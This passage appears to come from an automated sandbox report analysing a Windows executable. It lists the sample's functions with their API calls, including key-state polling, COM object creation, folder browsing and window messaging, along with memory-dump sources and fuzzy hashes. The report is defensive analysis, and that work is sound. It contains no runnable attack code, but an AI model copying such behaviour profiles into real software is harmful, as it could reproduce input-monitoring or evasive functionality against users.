                                                                                                                                                                                                                                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 010286B9
                                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 01028711
                                                                                                                                                                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0102879C
                                                                                                                                                                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 010287BF
                                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 010287C6
                                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 0102881B
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 01028821
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5678c966d5859d3bb94b73ddf4e335ffafccc551bdd1e968ebd4ebd121978f83
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4e5dbc31c9cca789bd7a83067ba3e2d665203dd0de4887a0256c813718ffdc50
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5678c966d5859d3bb94b73ddf4e335ffafccc551bdd1e968ebd4ebd121978f83
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FEC14B79A00119AFDB10DFA4C888DAEBBF9FF48304B148099E959DB261CB35ED45CF90
                                                                                                                                                                                                                                                                                                        Function 01010378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0101039F
                                                                                                                                                                                                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 010103F8
                                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0101040A
                                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0101042A
                                                                                                                                                                                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0101047D
                                                                                                                                                                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 01010491
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 010104A6
                                                                                                                                                                                                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 010104B3
                                                                                                                                                                                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 010104BC
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 010104CE
                                                                                                                                                                                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 010104D9
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: bbddcf9297cc0680b289a4c02340fd893d08df7d79fe1079cbc4696389e19921
                                                                                                                                                                                                                                                                                                        • Instruction ID: 015a0a4951871f7b02a52195682263bafc30f63d45ae7ad3e00db152ca9a19d1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bbddcf9297cc0680b289a4c02340fd893d08df7d79fe1079cbc4696389e19921
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 964183B5A00219EFCB10DFA4D8849EE7BB9FF58354F008069F985A7255CB39E985CF90
                                                                                                                                                                                                                                                                                                        Function 0101A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 0101A65D
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 0101A6DE
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 0101A6F9
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 0101A713
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 0101A728
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 0101A740
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 0101A752
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0101A76A
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(00000012), ref: 0101A77C
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 0101A794
                                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 0101A7A6
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0b491498ef64f47fec439e00c5e4dccc73d34b1933a64a9146b67a6338593d63
                                                                                                                                                                                                                                                                                                        • Instruction ID: f7663c968fe080c1d0d1010a9f7a5e4d85cfe77a24652fdc0a72f4e74beb81ec
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b491498ef64f47fec439e00c5e4dccc73d34b1933a64a9146b67a6338593d63
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4041C5B47067C5AAFFB2866889443A5BEF07B05304F048499D6C7471C7DBAC96C887A2
                                                                                                                                                                                                                                                                                                        Function 01039730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                                        • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3687e0a8c1178b047829e9d2a8669dc88b1256409b372839e7f9a473ba5c08fc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5f6b087afce38944f23aec9fc6045d715370beefa673b2f027918a6f3164605f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3687e0a8c1178b047829e9d2a8669dc88b1256409b372839e7f9a473ba5c08fc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6351D531A00117EBCB15DF6CC9508FEB7E9BF94368720426AE8A6E7385D775D940C790
                                                                                                                                                                                                                                                                                                        Function 01034189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32 ref: 010341D1
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 010341DC
                                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,01050B44,?), ref: 01034236
                                                                                                                                                                                                                                                                                                        • IIDFromString.OLE32(?,?), ref: 010342A9
                                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 01034341
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 01034393
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                                        • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0c7dd7b1087a9c1a5eabe36b5b22dc40cefabc09118dd4e4436b68c5e808a66b
                                                                                                                                                                                                                                                                                                        • Instruction ID: d0770d24a5412b1048de38d97ef580c8a69dc43b74b07aa33ffcfd062caf2838
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c7dd7b1087a9c1a5eabe36b5b22dc40cefabc09118dd4e4436b68c5e808a66b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8619C71608301AFD310DFA5C888BAEBBE8AF89714F00494DF9C5EB291C774E944CB92
                                                                                                                                                                                                                                                                                                        Function 01028BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 01028C9C
                                                                                                                                                                                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 01028CAC
                                                                                                                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01028CB8
                                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01028D55
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 01028D69
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 01028D9B
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 01028DD1
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 01028DDA
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                                        • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                                                        • Opcode ID: 067f16f2b017f7af9de81c08fe7a06f572e11704a9ec4380060a05a1767d00f9
                                                                                                                                                                                                                                                                                                        • Instruction ID: ce84d1f6be9b14dff057df18fce55f14698ca83544b191ff7837f18925064b43
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 067f16f2b017f7af9de81c08fe7a06f572e11704a9ec4380060a05a1767d00f9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 346169B65043159FD710EF64C88499EB7E8FF98310F04885EE9C987251DB39E945CF92
                                                                                                                                                                                                                                                                                                        Function 010446E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateMenu.USER32 ref: 01044715
                                                                                                                                                                                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 01044724
                                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 010447AC
                                                                                                                                                                                                                                                                                                        • IsMenu.USER32(?), ref: 010447C0
                                                                                                                                                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 010447CA
                                                                                                                                                                                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010447F7
                                                                                                                                                                                                                                                                                                        • DrawMenuBar.USER32 ref: 010447FF
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                                        • String ID: 0$F
                                                                                                                                                                                                                                                                                                        • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                                                        • Opcode ID: 03e517971d16b23be3d13440d249de5d65223f4cbee49af36122f23dd6eb3f33
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1129696f6bc92b7eb02431baa5b8aee313fce78c859780400f66b6560e13eb28
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03e517971d16b23be3d13440d249de5d65223f4cbee49af36122f23dd6eb3f33
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E94189B8A01209AFEB24CFA8D984BAE7BF5FF09314F04406CFA8597341C775A914CB90
                                                                                                                                                                                                                                                                                                        Function 0101282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010145FD: GetClassNameW.USER32(?,?,000000FF), ref: 01014620
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 010128B1
                                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 010128BC
                                                                                                                                                                                                                                                                                                        • GetParent.USER32 ref: 010128D8
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 010128DB
                                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 010128E4
                                                                                                                                                                                                                                                                                                        • GetParent.USER32(?), ref: 010128F8
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 010128FB
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                        • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1ba690faa5de0a9c240a212ac7ced730cbe105fb776c7b331c4a41ee6fa2d4c1
                                                                                                                                                                                                                                                                                                        • Instruction ID: 61f282ec7f4d1914d973137b0850ab239653782c82440cbe12901d1830bdce1f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ba690faa5de0a9c240a212ac7ced730cbe105fb776c7b331c4a41ee6fa2d4c1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F21C2B4D00118BBCF14ABA5CC84DEEBBB8EF19350F100156B9A1A7295DB7E4409DB60
                                                                                                                                                                                                                                                                                                        Function 0101290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010145FD: GetClassNameW.USER32(?,?,000000FF), ref: 01014620
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 01012990
                                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 0101299B
                                                                                                                                                                                                                                                                                                        • GetParent.USER32 ref: 010129B7
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 010129BA
                                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 010129C3
                                                                                                                                                                                                                                                                                                        • GetParent.USER32(?), ref: 010129D7
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 010129DA
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                        • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                                        • Opcode ID: 046f58bd55d5e467ebe5e91d5cfd054f51646dc54d154a19aae86dd43f6e703f
                                                                                                                                                                                                                                                                                                        • Instruction ID: dbf788dcc546625399da7b62f260d71030866135e31177db0efc8604712b9b29
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 046f58bd55d5e467ebe5e91d5cfd054f51646dc54d154a19aae86dd43f6e703f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D521CFB5E00118BBDF10EBA4CC85EEEBBB9EF19340F104056B991A7199DB7E4809DB60
                                                                                                                                                                                                                                                                                                        Function 010444BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01044539
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0104453C
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 01044563
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01044586
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 010445FE
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 01044648
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 01044663
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0104467E
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 01044692
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 010446AF
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 460c2c202ec1817f5fe0a3c055e7ec3c1b613f5e93769be3c1bcb4e0d96c21df
                                                                                                                                                                                                                                                                                                        • Instruction ID: 261cc1c2de0f6c95e002354e0841d93224c6e402357f0f61c1878425922be115
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 460c2c202ec1817f5fe0a3c055e7ec3c1b613f5e93769be3c1bcb4e0d96c21df
